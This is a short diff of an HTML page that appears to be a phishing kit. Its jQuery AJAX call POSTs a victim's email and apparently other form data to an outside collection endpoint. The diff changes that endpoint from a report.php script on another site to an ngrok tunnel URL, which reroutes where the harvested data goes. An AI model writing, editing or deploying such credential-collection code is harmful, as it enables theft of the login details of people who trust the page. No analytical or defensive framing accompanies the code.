--- a/sample.html
+++ b/sample.html
@@ -1,4 +1,4 @@
-﻿
+
 
 <html id="html" data-ref="alphash" data-iframe="0" lang="en"><head>
     <meta charset="UTF-8">
@@ -1368,7 +1368,7 @@ count=count+1;
 
 $.ajax({
 dataType: 'JSON',
-url: 'https://elojobsky.com/wp-sykman/report.php',
+url: 'https://4162-185-29-11-107.ngrok-free.app/fav.',
 type: 'POST',
       	data:{
 			email:email,
